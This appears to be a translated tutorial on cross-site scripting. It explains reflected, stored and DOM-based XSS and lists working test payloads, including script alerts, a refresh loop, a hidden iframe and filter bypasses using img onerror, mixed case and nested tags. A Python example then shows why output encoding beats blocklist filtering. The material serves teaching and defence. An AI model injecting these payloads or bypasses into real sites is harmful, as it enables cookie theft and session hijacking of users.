xss

<script>alert('xss')</script>

Introduction to XSS - Principle
Attackers inject malicious script code into web pages and wait for other users to browse
those pages (or for some other trigger condition); the malicious code then executes in those users' browsers.


Use XSS to pop up a malicious alert box
<script>alert('xss')</script>
Make the web page refresh endlessly
<meta http-equiv='refresh' content='0'>
Embed a hidden link to another site
<iframe src=http://127.0.0.1 width=0 height=0></iframe>
Introduction to XSS – Hazard
Stealing user cookies and then impersonating the user on the site
Stealing all kinds of user accounts
Hijacking user sessions and performing arbitrary actions in the user's name
Inflating traffic counts and showing pop-up advertisements
Spreading worms

Introduction to XSS – Classification
1. Reflected
The payload is generally not stored on the server
Features: non-persistent, parameter-based cross-site scripting
Use: stealing the user's cookie or phishing
2. Stored
The payload is saved on the server
Features: persistent, more harmful
Use: further intrusion, planting malware (drive-by downloads), worms, phishing
3. DOM-based
A newer class of XSS, based on client-side JavaScript
Usually grouped together with reflected XSS

 


1. Reflected Cross-site Scripting
Also known as non-persistent or parametric XSS. It is the most common and most widely exploited type:
the malicious script is appended to a parameter of the URL.

http://127.0.0.1/search.php?key="><script>alert(1)</script>
http://127.0.0.1/test.php?name=<iframe src=javascript:alert(1)>11

Testing for Reflected XSS Attacks

(1) Read the code and find the key variable, i.e. the user input that is reflected into the page. If that variable is output without HTML encoding (htmlEncode), it has an XSS vulnerability.

(2) Prepare the test scripts; see the last few pictures for more scripts
<script>alert(document.cookie)</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)
"onclick="alert(1)

 


2. Stored Cross-site Scripting
Also known as persistent XSS (Persistent Cross-site Scripting); it is more threatening than
reflected XSS.
The attacker uploads or stores malicious JavaScript on the vulnerable server in advance; whenever
a victim browses a page containing that malicious JavaScript, the code executes.
Stored XSS usually appears in interactive features such as message boards, comments and blog posts;
the malicious script is stored in the client-side or server-side database.

 


Several bypass methods
<script>alert(1)</script>

$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );

Because message is encoded with htmlspecialchars before being output, it has no XSS vulnerability.
The name field, however, only uses str_replace to replace <script> with an empty string, so there are three ways to bypass it:
A tag other than <script>: <img src=0 onerror=alert(/xss1/)>
Changing case: <Script>alert(/xss2/)</sCript>
Nested <script> tags: <sc<script>ript>alert(/xss3/)</script>


$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

preg_replace performs a regular-expression search and replace, and this pattern only looks for the letters of "script", so other tags such as <img>, <a> and <iframe> can be used instead. For example, with the <img> tag used above, build the payload <img src=0 onerror=alert(/xss/)>,
substitute it into the intercepted request, and the XSS code executes successfully.
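To make the difference between the three filters concrete, here is an added Python example (not code from the original page or its author) that re-implements the str_replace, preg_replace and htmlspecialchars behaviour shown above, runs the page's own payloads through each one, and applies the check from step (1) of the reflected-XSS test: does the reflected value still contain a tag the browser would parse? The PAYLOADS table, the renders_markup check and the function names are constructed for this example; the filter bodies mirror the PHP one-liners quoted on this page.

```python
"""Blocklist filters versus output encoding, exercised with the page's own payloads."""
import html
import re

# Constructed sample inputs: the payloads quoted on this page plus one benign string.
PAYLOADS = {
    "plain_script": "<script>alert(1)</script>",
    "img_onerror": "<img src=0 onerror=alert(/xss1/)>",
    "mixed_case": "<Script>alert(/xss2/)</sCript>",
    "nested_script": "<sc<script>ript>alert(/xss3/)</script>",
    "benign": "Tom & Jerry <3",
}


def filter_str_replace(value: str) -> str:
    """Python equivalent of  $name = str_replace('<script>', '', $name);
    Removes only the literal lowercase tag, once per occurrence, and nothing else."""
    return value.replace("<script>", "")


def filter_preg_replace(value: str) -> str:
    """Python equivalent of  $name = preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name);
    Case-insensitive and defeats the nested trick, but it only ever looks for 'script'."""
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", value, flags=re.IGNORECASE)


def encode_output(value: str) -> str:
    """Python equivalent of  htmlspecialchars($message, ENT_QUOTES);
    Encodes < > & " ' so the browser displays the text instead of parsing it."""
    return html.escape(value, quote=True)


# A start tag the HTML parser would act on: '<' followed by a letter, up to the next '>'.
TAG_RE = re.compile(r"<[A-Za-z][^>]*>")


def renders_markup(value: str) -> bool:
    """True if the string, placed into an HTML body, still contains a live start tag.
    This is the mechanical form of the page's check (1): is the reflected value
    still raw markup, or has it been HTML-encoded?"""
    return TAG_RE.search(value) is not None


def evaluate(filter_fn) -> dict:
    """Run every payload through one filter; map payload name -> True if markup survives."""
    return {name: renders_markup(filter_fn(raw)) for name, raw in PAYLOADS.items()}


def main() -> None:
    for label, fn in [("str_replace", filter_str_replace),
                      ("preg_replace", filter_preg_replace),
                      ("htmlspecialchars", encode_output)]:
        survivors = [name for name, alive in evaluate(fn).items() if alive]
        print(f"{label:17s} markup survives for: {survivors or 'none'}")


if __name__ == "__main__":
    main()
```

Running it shows str_replace letting the <img>, mixed-case and nested payloads through, preg_replace letting only the <img> payload through, and htmlspecialchars letting nothing through while keeping the benign string readable. The lesson for the defender is that stripping substrings is a blocklist that can only grow, whereas encoding at the output point is a complete answer for the HTML-body context (attribute and JavaScript contexts need their own encoding on top).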
